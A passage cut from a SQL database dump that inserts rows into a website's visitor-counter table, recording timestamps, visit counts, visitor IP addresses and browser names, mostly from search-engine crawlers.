66.249.75.179','chrome'),(82777,1484175460,1,1,0,0,'52.86.176.3','other'),(82778,1484176404,1,0,1,0,'66.249.69.152',''),(82779,1484176780,7,7,0,0,'66.249.69.149','chrome'),(82780,1484176819,2,2,0,0,'66.249.69.152','chrome'),(82781,1484177057,1,1,0,0,'66.249.69.155','chrome'),(82782,1484177651,1,0,1,0,'66.249.75.183',''),(82783,1484178111,2,2,0,0,'66.249.69.155','chrome'),(82784,1484178170,2,2,0,0,'66.249.69.149','chrome'),(82785,1484178240,1,1,0,0,'66.249.69.152','chrome'),(82786,1484178519,1,0,1,0,'66.249.75.179',''),(82787,1484179666,1,1,0,0,'178.154.149.10','other'),(82788,1484179670,1,0,1,0,'66.249.75.183',''),(82789,1484180090,1,1,0,0,'163.172.64.242','other'),(82790,1484181006,1,0,1,0,'66.249.75.179',''),(82791,1484182812,1,0,1,0,'66.249.75.179',''),(82792,1484183290,1,1,0,0,'141.8.142.67','other'),(82793,1484183444,2,2,0,0,'141.8.142.61','other'),(82794,1484183471,1,1,0,0,'178.154.189.37','other'),(82796,1484183484,8,8,0,0,'141.8.142.58','other'),(82797,1484183500,1,1,0,0,'141.8.132.10','other'),(82798,1484183512,6,6,0,0,'130.193.51.19','other'),(82799,1484183545,6,6,0,0,'141.8.142.175','other'),(82800,1484183563,1,1,0,0,'178.154.189.31','other'),(82801,1484183715,3,3,0,0,'130.193.50.34','other'),(82802,1484183819,3,3,0,0,'141.8.183.25','other'),(82803,1484185665,1,1,0,0,'163.172.64.241','other'),(82804,1484188120,1,0,1,0,'66.249.75.179',''),(82805,1484188373,1,0,1,0,'66.249.69.152',''),(82806,1484188645,1,1,0,0,'95.27.191.201','chrome'),(82807,1484191702,1,1,0,0,'163.172.64.177','other'),(82808,1484193034,2,2,0,0,'46.4.32.75','other'),(82809,1484193065,2,2,0,0,'130.193.51.19','other'),(82810,1484195483,1,1,0,0,'141.8.142.58','other'),(82811,1484196058,1,0,1,0,'66.249.75.183',''),(82812,1484196336,1,1,0,0,'66.249.75.183','chrome'),(82813,1484197378,1,0,1,0,'66.249.75.179',''),(82814,1484197693,1,0,1,0,'66.249.69.152',''),(82815,1484197754,2,2,0,0,'141.8.142.175','other'),(82816,1484198271,1,1,0,0,'62.212.73.211','other'),(82817,1484199159,1,0,1,0,'66.249.75.179',''),(82818,1484201475,1,1,0,0,'141.8.183.25','other'),(82819,1484201986,1,1,0,0,'141.8.142.61','other'),(82820,1484202231,1,1,0,0,'91.196.178.70','firefox'),(82821,1484202368,1,1,0,0,'213.133.162.114','chrome'),(82822,1484202487,1,1,0,0,'91.196.178.72','firefox'),(82823,1484202922,1,1,0,0,'51.15.57.90','chrome'),(82824,1484203251,1,1,0,0,'66.102.9.29','chrome'),(82825,1484203336,1,1,0,0,'141.8.142.175','other'),(82826,1484203736,1,1,0,0,'91.196.178.72','firefox'),(82827,1484203823,1,1,0,0,'130.193.37.7','other'),(82828,1484205403,1,1,0,0,'157.55.39.180','other'),(82829,1484205466,1,1,0,0,'95.133.177.226','firefox'),(82830,1484205485,1,1,0,0,'141.8.183.25','other'),(82831,1484205693,1,1,0,0,'141.8.142.58','other'),(82832,1484205859,1,1,0,0,'91.196.122.186','chrome'),(82833,1484206784,1,0,1,0,'66.249.75.187',''),(82834,1484206902,1,1,0,0,'91.196.178.35','chrome'),(82835,1484206932,1,1,0,0,'91.196.178.72','chrome'),(82836,1484207643,1,1,0,0,'37.53.239.221','firefox'),(82837,1484207675,1,1,0,0,'130.193.51.19','other'),(82838,1484207817,1,1,0,0,'95.133.177.226','firefox'),(82839,1484208654,1,1,0,0,'37.53.239.221','firefox'),(82840,1484208841,1,1,0,0,'91.196.178.71','firefox'),(82841,1484208923,1,1,0,0,'82.207.87.175','msie'),(82842,1484209202,1,1,0,0,'91.196.178.70','chrome'),(82843,1484210263,1,1,0,0,'91.196.178.72','chrome'),(82844,1484210287,1,1,0,0,'91.209.214.11','other'),(82845,1484210492,2,2,0,0,'130.193.50.34','other'),(82846,1484210789,1,1,0,0,'66.249.93.156','chrome'),(82847,1484211672,1,1,0,0,'176.107.196.103','chrome'),(82848,1484212494,1,1,0,0,'141.8.142.175','other'),(82849,1484212746,1,1,0,0,'91.196.178.39','chrome'),(82850,1484212965,1,1,0,0,'31.43.8.90','chrome'),(82851,1484213234,1,1,0,0,'200.53.13.85','firefox'),(82852,1484214086,1,0,1,0,'66.249.75.183',''),(82853,1484214219,1,1,0,0,'141.8.142.58','other'),(82854,1484214336,1,1,0,0,'91.196.178.72','firefox'),(82855,1484214432,1,1,0,0,'95.132.44.198','firefox'),(82856,1484214457,1,1,0,0,'141.8.183.25','other'),(82857,1484215270,1,1,0,0,'91.196.177.26','chrome'),(82858,1484215528,1,0,1,0,'66.249.69.155',''),(82859,1484215607,1,1,0,0,'91.196.179.138','firefox'),(82860,1484215735,1,1,0,0,'141.8.142.67','other'),(82861,1484215764,1,1,0,0,'180.76.15.151','other'),(82862,1484215785,3,3,0,0,'130.193.51.14','other'),(82863,1484215905,4,4,0,0,'130.193.51.19','other'),(82864,1484215956,1,1,0,0,'188.0.76.186','chrome'),(82865,1484215963,2,2,0,0,'141.8.132.10','other'),(82866,1484215967,2,2,0,0,'178.154.189.31','other'),(82867,1484215995,3,3,0,0,'141.8.142.61','other'),(82868,1484216157,1,1,0,0,'130.193.50.34','other'),(82869,1484216275,2,2,0,0,'141.8.142.175','other'),(82870,1484216460,1,1,0,0,'141.8.184.22','other'),(82871,1484216748,2,2,0,0,'141.8.142.58','other'),(82872,1484216971,1,1,0,0,'130.193.51.19','other'),(82873,1484217008,1,1,0,0,'130.180.219.81','firefox'),(82874,1484217072,1,1,0,0,'130.193.50.34','other'),(82875,1484217164,1,1,0,0,'93.158.152.84','other'),(82876,1484217167,1,1,0,0,'141.8.132.30','other'),(82877,1484217409,1,1,0,0,'94.179.4.0','firefox'),(82878,1484217643,1,0,1,0,'66.249.75.179',''),(82879,1484217804,1,1,0,0,'5.255.253.10','other'),(82880,1484219154,1,1,0,0,'141.8.132.10','other'),(82881,1484219302,1,1,0,0,'178.216.5.24','chrome'),(82882,1484219554,1,1,0,0,'93.158.152.84','other'),(82883,1484219716,1,1,0,0,'91.196.177.26','chrome'),(82884,1484219918,1,1,0,0,'163.172.64.241','other'),(82885,1484220015,1,1,0,0,'195.10.210.49','chrome'),(82886,1484221029,1,1,0,0,'195.69.221.21','chrome'),(82887,1484221120,1,1,0,0,'92.113.0.251','chrome'),(82888,1484221363,50,50,0,0,'208.43.225.85','other'),(82889,1484221703,1,1,0,0,'91.196.178.72','firefox'),(82890,1484222017,1,1,0,0,'163.172.64.186','other'),(82891,1484222325,1,1,0,0,'141.8.132.41','other'),(82892,1484222424,1,1,0,0,'178.154.189.31','other'),(82893,1484222483,3,3,0,0,'141.8.142.175','other'),(82894,1484222537,1,1,0,0,'5.255.253.67','other'),(82895,1484222637,1,1,0,0,'163.172.64.183','other'),(82896,1484222705,1,1,0,0,'141.8.142.61','other'),(82897,1484222765,1,1,0,0,'130.193.50.34','other'),(82898,1484222835,1,1,0,0,'141.8.142.85','other'),(82899,1484222865,1,0,1,0,'66.249.75.187',''),(82900,1484222913,1,1,0,0,'141.8.132.10','other'),(82901,1484223190,1,1,0,0,'91.196.178.69','firefox'),(82902,1484223528,1,0,1,0,'68.180.229.254',''),(82903,1484223865,1,0,1,0,'66.249.75.187',''),(82904,1484224738,1,1,0,0,'180.76.15.24','other'),(82905,1484224774,1,1,0,0,'188.0.76.186','chrome'),(82906,1484225553,1,1,0,0,'141.8.142.58','other'),(82907,1484226044,1,1,0,0,'141.8.142.67','other'),(82908,1484226290,1,1,0,0,'130.193.50.34','other'),(82909,1484226948,1,1,0,0,'141.8.142.58','other'),(82910,1484226981,1,1,0,0,'94.179.147.66','chrome'),(82911,1484227037,1,1,0,0,'141.8.142.175','other'),(82912,1484227212,1,1,0,0,'130.193.51.19','other'),(82913,1484227372,1,1,0,0,'92.113.128.102','chrome'),(82914,1484228224,1,0,1,0,'66.249.69.149',''),(82915,1484228727,1,1,0,0,'188.0.76.186','chrome'),(82916,1484229026,1,1,0,0,'95.132.82.97','firefox'),(82917,1484229298,2,0,2,0,'66.249.75.183',''),(82918,1484229498,1,1,0,0,'141.8.142.58','other'),(82919,1484229593,1,1,0,0,'91.196.122.186','chrome'),(82920,1484229644,1,1,0,0,'163.172.64.236','other'),(82921,1484229877,2,2,0,0,'141.8.142.61','other'),(82922,1484230008,2,2,0,0,'141.8.142.67','other'),(82923,1484230059,1,1,0,0,'91.196.178.72','firefox'),(82924,1484230134,1,1,0,0,'141.8.142.175','other'),(82925,1484230161,1,1,0,0,'46.200.243.225','chrome'),(82926,1484230186,1,1,0,0,'94.179.44.35','chrome'),(82927,1484230242,1,1,0,0,'91.196.178.72','chrome'),(82928,1484230743,2,2,0,0,'130.193.50.34','other'),(82929,1484230907,1,1,0,0,'37.52.18.6','firefox'),(82930,1484230919,2,2,0,0,'141.8.142.58','other'),(82931,1484231126,1,1,0,0,'91.196.178.69','firefox'),(82932,1484231198,1,1,0,0,'91.201.240.211','chrome'),(82933,1484231478,1,1,0,0,'95.132.133.162','chrome'),(82934,1484231805,1,1,0,0,'130.193.50.34','other'),(82935,1484231810,1,1,0,0,'46.211.154.160','other'),(82936,1484232207,2,2,0,0,'141.8.142.175','other'),(82937,1484232432,1,1,0,0,'141.8.142.61','other'),(82938,1484232811,1,1,0,0,'91.196.178.72','chrome'),(82939,1484233035,1,1,0,0,'130.193.51.19','other'),(82940,1484233447,1,1,0,0,'92.113.150.242','chrome'),(82941,1484233654,1,1,0,0,'163.172.64.246','other'),(82942,1484234103,1,1,0,0,'94.178.220.25','chrome'),(82943,1484235800,1,1,0,0,'78.111.185.84','chrome'),(82944,1484236056,1,0,1,0,'66.249.75.179',''),(82945,1484236896,1,1,0,0,'163.172.64.236','other'),(82946,1484237023,1,0,1,0,'68.180.229.190',''),(82947,1484237141,1,1,0,0,'195.10.210.49','chrome'),(82948,1484237514,1,1,0,0,'180.76.15.21','other'),(82949,1484238582,1,1,0,0,'91.196.178.162','chrome'),(82950,1484239117,1,1,0,0,'92.113.126.78','firefox'),(82951,1484239933,2,2,0,0,'5.9.154.102','other'),(82952,1484241391,1,1,0,0,'163.172.64.233','other'),(82953,1484242721,1,1,0,0,'66.249.69.149','chrome'),(82954,1484242764,1,1,0,0,'141.8.183.25','other'),(82955,1484242850,1,1,0,0,'163.172.64.241','other'),(82956,1484242881,1,0,1,0,'66.249.75.187',''),(82957,1484243088,1,1,0,0,'157.55.39.225','other'),(82958,1484244875,1,0,1,0,'66.249.69.149',''),(82959,1484245740,1,0,1,0,'66.249.75.187',''),(82960,1484247419,1,1,0,0,'176.122.98.5','chrome'),(82961,1484248180,1,1,0,0,'195.154.181.15','chrome'),(82962,1484249510,1,1,0,0,'91.196.178.37','chrome'),(82963,1484249694,1,1,0,0,'66.249.75.187','chrome'),(82964,1484249753,1,1,0,0,'66.102.9.25','chrome'),(82965,1484249834,1,1,0,0,'193.194.127.217','firefox'),(82966,1484250243,1,1,0,0,'180.76.15.134','other'),(82967,1484250516,1,0,1,0,'66.249.75.179',''),(82968,1484250685,1,1,0,0,'91.196.178.40','chrome'),(82969,1484250820,1,1,0,0,'157.55.39.180','other'),(82970,1484250855,1,1,0,0,'163.172.64.180','other'),(82971,1484251180,1,1,0,0,'91.196.178.68','chrome'),(82972,1484252685,1,1,0,0,'141.8.142.58','other'),(82973,1484252993,1,0,1,0,'66.249.75.183',''),(82974,1484254234,1,1,0,0,'95.132.52.246','chrome'),(82975,1484254283,1,1,0,0,'130.193.50.34','other'),(82976,1484254553,1,1,0,0,'37.47.165.26','other'),(82977,1484254573,1,0,1,0,'66.249.75.179',''),(82978,1484255018,1,1,0,0,'141.8.142.58','other'),(82979,1484255220,1,1,0,0,'178.95.74.186','chrome'),(82980,1484256215,1,1,0,0,'141.8.183.19','other'),(82981,1484256429,1,1,0,0,'141.8.183.25','other'),(82982,1484256738,1,1,0,0,'94.158.79.134','chrome'),(82983,1484257441,2,2,0,0,'141.8.183.25','other'),(82984,1484257493,1,1,0,0,'178.210.133.62','chrome'),(82985,1484258143,2,2,0,0,'141.8.142.58','other'),(82986,1484258404,1,1,0,0,'141.8.142.175','other'),(82987,1484258848,1,1,0,0,'94.158.79.134','chrome'),(82988,1484259130,1,1,0,0,'163.172.64.225','other'),(82989,1484260047,1,1,0,0,'130.193.50.6','other'),(82990,1484261002,1,0,1,0,'66.249.69.149',''),(82991,1484261614,1,0,1,0,'66.249.75.187',''),(82992,1484262689,1,1,0,0,'157.55.39.225','other'),(82993,1484263622,1,1,0,0,'141.8.142.61','other'),(82994,1484264223,1,1,0,0,'157.55.39.225','other'),(82995,1484265580,1,1,0,0,'130.193.50.34','other'),(82996,1484265773,1,1,0,0,'141.8.142.175','other'),(82997,1484266810,1,1,0,0,'141.8.142.67','other'),(82998,1484267022,1,1,0,0,'93.158.152.84','other'),(82999,1484267037,1,0,1,0,'66.249.75.179',''),(83000,1484268858,1,1,0,0,'141.8.142.175','other'),(83001,1484270628,2,2,0,0,'130.193.51.19','other'),(83002,1484270752,2,2,0,0,'130.193.50.34','other'),(83003,1484271048,1,1,0,0,'66.249.75.179','chrome'),(83004,1484271170,2,2,0,0,'141.8.142.175','other'),(83005,1484271853,1,0,1,0,'66.249.75.183',''),(83006,1484273565,1,1,0,0,'66.249.69.155','chrome'),(83007,1484275101,2,0,2,0,'66.249.75.179',''),(83008,1484275850,1,0,1,0,'66.249.69.152',''),(83009,1484276580,1,1,0,0,'141.8.183.25','other'),(83010,1484276633,1,1,0,0,'130.193.50.34','other'),(83011,1484276883,1,1,0,0,'141.8.142.58','other'),(83012,1484278521,1,0,1,0,'66.249.75.183',''),(83013,1484278910,1,0,1,0,'66.249.75.179',''),(83014,1484279139,1,1,0,0,'141.8.142.175','other'),(83015,1484279478,1,1,0,0,'163.172.64.188','other'),(83016,1484280311,1,1,0,0,'130.193.51.19','other'),(83017,1484280350,1,1,0,0,'163.172.64.252','other'),(83018,1484280398,1,1,0,0,'87.228.95.129','chrome'),(83019,1484280442,1,1,0,0,'66.249.75.187','chrome'),(83020,1484280467,1,1,0,0,'141.0.13.146','other'),(83021,1484280834,1,1,0,0,'141.8.142.58','other'),(83022,1484281715,1,0,1,0,'66.249.75.183',''),(83023,1484281775,1,1,0,0,'141.8.142.61','other'),(83024,1484282472,1,0,1,0,'66.249.75.187',''),(83025,1484284298,1,1,0,0,'141.8.142.67','other'),(83026,1484284466,1,0,1,0,'66.249.75.179',''),(83027,1484284992,1,1,0,0,'87.228.95.129','chrome'),(83028,1484285151,1,1,0,0,'157.55.39.180','other'),(83029,1484285514,1,1,0,0,'163.172.64.250','other'),(83030,1484285760,1,1,0,0,'66.249.75.179','chrome'),(83031,1484286548,1,1,0,0,'141.8.142.58','other'),(83032,1484287001,1,1,0,0,'163.172.64.234','other'),(83033,1484287438,1,1,0,0,'91.196.178.66','firefox'),(83034,1484287921,1,1,0,0,'185.114.136.136','firefox'),(83035,1484288298,1,1,0,0,'163.172.64.179','other'),(83036,1484288352,1,1,0,0,'141.8.142.175','other'),(83037,1484288478,1,1,0,0,'93.158.152.84','other'),(83038,1484288603,1,1,0,0,'141.8.142.58','other'),(83039,1484288833,1,0,1,0,'66.249.75.183',''),(83040,1484289174,1,1,0,0,'130.193.50.34','other'),(83041,1484289726,1,1,0,0,'91.196.178.69','chrome'),(83042,1484289834,1,1,0,0,'180.76.15.21','other'),(83043,1484290072,1,1,0,0,'52.86.176.3','other'),(83044,1484290145,1,0,1,0,'66.249.75.179',''),(83045,1484290200,1,1,0,0,'91.196.178.72','chrome'),(83046,1484290488,2,2,0,0,'130.193.50.34','other'),(83047,1484290750,2,2,0,0,'141.8.142.61','other'),(83048,1484290916,1,0,1,0,'66.249.75.187',''),(83049,1484291050,1,1,0,0,'5.255.253.68','other'),(83050,1484291279,1,1,0,0,'91.199.138.34','chrome'),(83051,1484292167,2,2,0,0,'130.193.50.34','other'),(83052,1484292262,1,1,0,0,'91.196.178.67','chrome'),(83053,1484292302,1,1,0,0,'130.193.51.19','other'),(83054,1484293233,1,1,0,0,'141.8.142.175','other'),(83055,1484293331,1,1,0,0,'91.196.178.104','chrome'),(83056,1484295032,1,1,0,0,'141.8.183.25','other'),(83057,1484295301,2,2,0,0,'141.8.142.58','other'),(83058,1484295426,1,1,0,0,'141.8.142.175','other'),(83059,1484295792,1,1,0,0,'141.8.142.67','other'),(83060,1484297105,1,1,0,0,'91.196.178.69','firefox'),(83061,1484298113,1,1,0,0,'178.210.130.14','chrome'),(83062,1484298616,3,3,0,0,'141.8.142.175','other'),(83063,1484298672,1,1,0,0,'213.133.177.171','chrome'),(83064,1484298820,1,1,0,0,'130.193.50.34','other'),(83065,1484299418,1,1,0,0,'87.228.95.129','chrome'),(83066,1484299570,1,1,0,0,'91.196.177.26','chrome'),(83067,1484299796,1,1,0,0,'93.158.152.46','other'),(83068,1484299799,1,1,0,0,'130.193.50.38','other'),(83069,1484299924,1,1,0,0,'130.193.50.34','other'),(83070,1484300121,1,1,0,0,'178.94.18.35','chrome'),(83071,1484300440,1,1,0,0,'195.34.204.54','chrome'),(83072,1484301340,1,1,0,0,'37.52.18.6','firefox'),(83073,1484301360,1,1,0,0,'178.94.255.95','firefox'),(83074,1484301921,1,1,0,0,'91.196.178.65','firefox'),(83075,1484301929,1,1,0,0,'91.196.178.69','chrome'),(83076,1484302004,1,1,0,0,'94.179.83.156','firefox'),(83077,1484302457,1,1,0,0,'52.86.176.3','other'),(83078,1484302595,1,1,0,0,'141.8.142.175','other'),(83079,1484303336,1,1,0,0,'94.179.83.156','firefox'),(83080,1484304247,1,1,0,0,'91.196.178.71','firefox'),(83081,1484305594,1,1,0,0,'37.53.79.63','chrome'),(83082,1484306044,1,1,0,0,'130.193.50.34','other'),(83083,1484306048,1,1,0,0,'37.147.105.29','msie'),(83084,1484306186,2,2,0,0,'141.8.183.25','other'),(83085,1484306580,2,0,2,0,'66.249.75.179',''),(83086,1484306832,1,1,0,0,'130.180.216.3','chrome'),(83087,1484307438,1,1,0,0,'37.52.159.86','chrome'),(83088,1484307841,1,0,1,0,'66.249.75.187',''),(83089,1484308006,1,0,1,0,'66.249.69.149',''),(83090,1484308111,1,1,0,0,'157.55.39.193','other'),(83091,1484308292,1,1,0,0,'178.94.255.95','firefox'),(83092,1484308839,1,0,1,0,'66.249.75.179',''),(83093,1484308902,1,1,0,0,'109.173.25.162','other'),(83094,1484309597,1,1,0,0,'178.154.189.37','other'),(83095,1484309723,1,0,1,0,'66.249.75.187',''),(83096,1484309749,1,1,0,0,'130.193.51.19','other'),(83097,1484310008,1,1,0,0,'141.8.142.67','other'),(83098,1484310326,1,1,0,0,'141.8.142.58','other'),(83099,1484310546,1,1,0,0,'91.196.178.168','firefox'),(83100,1484311533,1,1,0,0,'91.196.178.164','chrome'),(83101,1484311886,1,1,0,0,'195.49.151.99','chrome'),(83102,1484312554,1,1,0,0,'208.43.225.84','other'),(83103,1484313101,1,1,0,0,'195.154.181.162','chrome'),(83104,1484313514,2,2,0,0,'141.8.142.175','other'),(83105,1484313546,1,1,0,0,'195.49.151.99','chrome'),(83106,1484313654,1,1,0,0,'37.55.161.9','chrome'),(83107,1484313747,1,1,0,0,'180.76.15.29','other'),(83108,1484313768,1,1,0,0,'141.8.142.61','other'),(83109,1484314352,1,1,0,0,'91.196.178.136','chrome'),(83110,1484314619,1,1,0,0,'91.196.177.26','chrome'),(83111,1484314696,1,1,0,0,'141.8.142.175','other'),(83112,1484314926,146,2,144,0,'62.210.188.38',''),(83113,1484315045,1,1,0,0,'141.8.142.61','other'),(83114,1484315065,71,71,0,0,'62.210.188.38','msie'),(83115,1484315159,5,5,0,0,'62.210.188.38','firefox'),(83116,1484315560,1,0,1,0,'66.249.69.152',''),(83117,1484315661,1,1,0,0,'162.210.196.130','other'),(83118,1484316597,1,1,0,0,'91.196.178.103','chrome'),(83119,1484317240,1,1,0,0,'94.179.92.181','firefox'),(83120,1484317955,1,1,0,0,'66.249.75.179','chrome'),(83121,1484318371,1,1,0,0,'130.193.50.34','other'),(83122,1484318579,1,1,0,0,'94.179.74.245','firefox'),(83123,1484319245,1,1,0,0,'141.8.183.19','other'),(83124,1484321003,1,1,0,0,'141.8.183.19','other'),(83125,1484323642,1,1,0,0,'178.74.242.61','firefox'),(83126,1484323652,1,1,0,0,'66.102.9.25','chrome'),(83127,1484323857,1,1,0,0,'37.115.105.208','chrome'),(83128,1484324512,1,1,0,0,'163.172.64.183','other'),(83129,1484326224,1,0,1,0,'66.249.75.183',''),(83130,1484326267,1,1,0,0,'66.249.69.152','chrome'),(83131,1484327202,1,1,0,0,'141.8.142.67','other'),(83132,1484327333,1,1,0,0,'141.8.183.25','other'),(83133,1484327902,1,0,1,0,'66.249.75.179',''),(83134,1484328204,1,1,0,0,'163.172.64.226','other'),(83135,1484328214,1,1,0,0,'91.196.178.65','firefox'),(83136,1484329492,1,1,0,0,'66.102.9.25','chrome'),(83137,1484332437,1,1,0,0,'141.8.142.171','other'),(83138,1484332896,1,1,0,0,'176.195.104.146','msie'),(83139,1484333154,1,1,0,0,'141.8.142.85','other'),(83140,1484333286,1,1,0,0,'130.193.51.19','other'),(83141,1484333405,1,1,0,0,'94.179.56.185','chrome'),(83142,1484334800,1,0,1,0,'66.249.75.183',''),(83143,1484335090,1,0,1,0,'66.249.75.187',''),(83144,1484335556,1,1,0,0,'94.179.29.239','chrome'),(83145,1484335628,1,1,0,0,'141.8.142.67','other'),(83146,1484336251,1,1,0,0,'130.193.51.19','other'),(83147,1484336307,1,1,0,0,'178.255.215.94','other'),(83148,1484336399,1,1,0,0,'130.193.50.34','other'),(83149,1484337146,1,1,0,0,'141.8.183.25','other'),(83150,1484337428,1,1,0,0,'141.8.142.61','other'),(83151,1484338193,1,1,0,0,'130.193.51.43','other'),(83152,1484338200,1,1,0,0,'141.8.142.175','other'),(83153,1484338477,1,1,0,0,'141.8.142.167','other'),(83154,1484338605,1,1,0,0,'141.8.142.25','other'),(83155,1484340042,1,1,0,0,'93.158.152.84','other'),(83156,1484340247,1,1,0,0,'141.8.183.25','other'),(83157,1484340458,1,1,0,0,'195.154.181.162','chrome'),(83158,1484340530,1,1,0,0,'141.8.142.61','other'),(83159,1484342705,1,1,0,0,'141.8.142.175','other'),(83160,1484342833,1,1,0,0,'141.8.142.67','other'),(83161,1484342837,1,1,0,0,'141.8.132.30','other'),(83162,1484343324,1,0,1,0,'68.180.229.190',''),(83163,1484343370,1,1,0,0,'93.158.152.84','other'),(83164,1484343596,1,1,0,0,'180.76.15.137','other'),(83165,1484343739,1,1,0,0,'5.255.253.68','other'),(83166,1484345075,1,1,0,0,'157.55.39.193','other'),(83167,1484345318,1,0,1,0,'66.249.75.183',''),(83168,1484346248,1,0,1,0,'68.180.229.254',''),(83169,1484346408,1,0,1,0,'66.249.79.119',''),(83170,1484348272,1,1,0,0,'64.246.165.10','firefox'),(83171,1484348517,1,1,0,0,'46.242.69.173','other'),(83172,1484349422,1,1,0,0,'163.172.64.180','other'),(83173,1484358630,3,3,0,0,'141.8.183.25','other'),(83174,1484362679,1,1,0,0,'130.193.51.19','other'),(83175,1484362807,1,1,0,0,'130.193.50.34','other'),(83176,1484363322,1,0,1,0,'66.249.75.179',''),(83177,1484365332,1,1,0,0,'141.8.142.61','other'),(83178,1484365989,1,1,0,0,'141.8.183.25','other'),(83179,1484366836,1,0,1,0,'66.249.75.183',''),(83180,1484367037,1,1,0,0,'66.249.69.155','chrome'),(83181,1484368730,1,1,0,0,'157.55.39.180','other'),(83182,1484369558,1,1,0,0,'109.173.58.55','msie'),(83183,1484369839,1,1,0,0,'141.8.142.58','other'),(83184,1484369997,1,1,0,0,'93.158.152.84','other'),(83185,1484370775,1,0,1,0,'66.249.75.179',''),(83186,1484370924,1,1,0,0,'95.221.253.136','msie'),(83187,1484371398,1,1,0,0,'180.76.15.140','other'),(83188,1484373729,1,1,0,0,'199.87.154.251','chrome'),(83189,1484373952,1,1,0,0,'141.8.132.10','other'),(83190,1484374077,1,1,0,0,'141.8.142.58','other'),(83191,1484375551,1,1,0,0,'95.221.252.237','msie'),(83192,1484375918,2,2,0,0,'95.213.141.126','opera'),(83193,1484377790,1,1,0,0,'91.196.178.33','chrome'),(83194,1484378437,1,1,0,0,'128.72.5.248','chrome'),(83195,1484379037,1,1,0,0,'188.32.183.138','opera'),(83196,1484379881,1,0,1,0,'66.249.75.187',''),(83197,1484380320,1,1,0,0,'157.55.39.225','other'),(83198,1484380378,1,1,0,0,'180.76.15.157','other'),(83199,1484381130,1,1,0,0,'128.68.49.113','msie'),(83200,1484382500,1,1,0,0,'66.249.75.179','chrome'),(83201,1484382512,1,1,0,0,'37.54.16.11','firefox'),(83202,1484382975,1,1,0,0,'188.232.160.60','msie'),(83203,1484383655,1,1,0,0,'141.8.183.25','other'),(83204,1484383746,1,1,0,0,'141.8.142.67','other'),(83205,1484386043,1,1,0,0,'66.249.69.152','chrome'),(83206,1484388121,1,0,1,0,'66.249.75.187',''),(83207,1484389623,1,0,1,0,'66.249.75.183',''),(83208,1484389693,1,1,0,0,'46.242.76.106','msie'),(83209,1484390064,1,1,0,0,'141.8.183.25','other'),(83210,1484390624,1,1,0,0,'188.32.176.246','chrome'),(83211,1484391329,1,1,0,0,'141.8.142.61','other'),(83212,1484391345,1,1,0,0,'130.193.51.19','other'),(83213,1484392621,1,1,0,0,'91.196.178.37','chrome'),(83214,1484393396,2,2,0,0,'141.8.142.175','other'),(83215,1484393552,1,1,0,0,'188.255.103.162','chrome'),(83216,1484393673,1,0,1,0,'66.249.69.149',''),(83217,1484394547,1,1,0,0,'130.193.51.14','other'),(83218,1484394772,1,1,0,0,'141.8.142.67','other'),(83219,1484394839,1,1,0,0,'93.158.152.40','other'),(83220,1484395115,1,1,0,0,'141.8.183.25','other'),(83221,1484395160,1,1,0,0,'130.193.50.34','other'),(83222,1484395197,1,1,0,0,'141.8.142.58','other'),(83223,1484395856,1,0,1,0,'66.249.75.187',''),(83224,1484396267,1,0,1,0,'66.249.75.179',''),(83225,1484397167,2,2,0,0,'66.249.69.155','chrome'),(83226,1484397174,1,1,0,0,'66.249.69.152','chrome'),(83227,1484397981,1,1,0,0,'5.228.108.242','firefox'),(83228,1484398021,1,1,0,0,'37.54.16.11','firefox'),(83229,1484398590,1,0,1,0,'66.249.75.179',''),(83230,1484400542,1,1,0,0,'40.77.167.26','other'),(83231,1484402921,1,0,1,0,'66.249.75.187',''),(83232,1484403474,1,1,0,0,'91.196.178.36','firefox'),(83233,1484403754,3,3,0,0,'141.8.142.58','other'),(83234,1484403800,1,1,0,0,'141.8.132.10','other'),(83235,1484403836,2,2,0,0,'141.8.142.67','other'),(83236,1484403876,1,1,0,0,'130.193.50.6','other'),(83237,1484404055,1,1,0,0,'40.77.167.23','other'),(83238,1484404113,2,2,0,0,'130.193.50.34','other'),(83239,1484404156,1,1,0,0,'195.154.181.162','chrome'),(83240,1484404209,2,2,0,0,'141.8.142.175','other'),(83241,1484404248,2,2,0,0,'5.255.253.47','other'),(83242,1484404873,2,2,0,0,'141.8.183.25','other'),(83243,1484405678,1,1,0,0,'40.77.167.26','other'),(83244,1484405969,1,0,1,0,'66.249.75.179',''),(83245,1484406145,1,1,0,0,'5.255.253.67','other'),(83246,1484406230,1,1,0,0,'141.8.183.25','other'),(83247,1484406231,1,1,0,0,'180.76.15.145','other'),(83248,1484406321,1,1,0,0,'141.8.142.175','other'),(83249,1484407093,1,1,0,0,'157.55.39.180','other'),(83250,1484408318,1,1,0,0,'46.188.34.46','chrome'),(83251,1484409256,1,1,0,0,'94.179.111.171','firefox'),(83252,1484410136,1,1,0,0,'91.196.178.67','firefox'),(83253,1484410250,1,1,0,0,'180.76.15.29','other'),(83254,1484411237,1,1,0,0,'157.55.39.225','other'),(83255,1484411304,1,1,0,0,'163.172.64.178','other'),(83256,1484411339,1,0,1,0,'66.249.75.187','');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (83257,1484411601,1,1,0,0,'46.211.255.11','chrome'),(83258,1484413559,1,1,0,0,'217.69.136.210','other'),(83259,1484414068,2,0,2,0,'66.249.75.183',''),(83260,1484415029,1,1,0,0,'66.249.75.179','chrome'),(83261,1484415248,1,1,0,0,'157.55.39.180','other'),(83262,1484416737,1,1,0,0,'46.118.159.66','chrome'),(83263,1484417712,1,1,0,0,'93.158.152.84','other'),(83264,1484419021,1,1,0,0,'40.77.167.23','other'),(83265,1484419100,1,1,0,0,'130.193.51.19','other'),(83266,1484419226,1,1,0,0,'141.8.142.58','other'),(83267,1484419269,1,0,1,0,'66.249.75.179',''),(83268,1484422676,3,3,0,0,'141.8.142.175','other'),(83269,1484422834,1,0,1,0,'66.249.75.183',''),(83270,1484423302,1,1,0,0,'141.8.142.61','other'),(83271,1484423488,1,1,0,0,'130.193.51.19','other'),(83272,1484423618,1,1,0,0,'141.8.183.25','other'),(83273,1484425526,1,0,1,0,'66.249.75.183',''),(83274,1484425968,1,0,1,0,'66.249.69.149',''),(83275,1484426040,1,1,0,0,'130.193.50.34','other'),(83276,1484426240,1,0,1,0,'66.249.75.179',''),(83277,1484426791,1,1,0,0,'141.8.142.58','other'),(83278,1484427697,1,1,0,0,'141.8.183.25','other'),(83279,1484428147,1,1,0,0,'163.172.64.237','other'),(83280,1484428271,1,1,0,0,'91.196.178.38','chrome'),(83281,1484428585,1,1,0,0,'77.123.11.138','chrome'),(83282,1484428753,1,1,0,0,'141.8.132.10','other'),(83283,1484429071,1,1,0,0,'141.8.142.58','other'),(83284,1484429196,1,1,0,0,'130.193.51.19','other'),(83285,1484429325,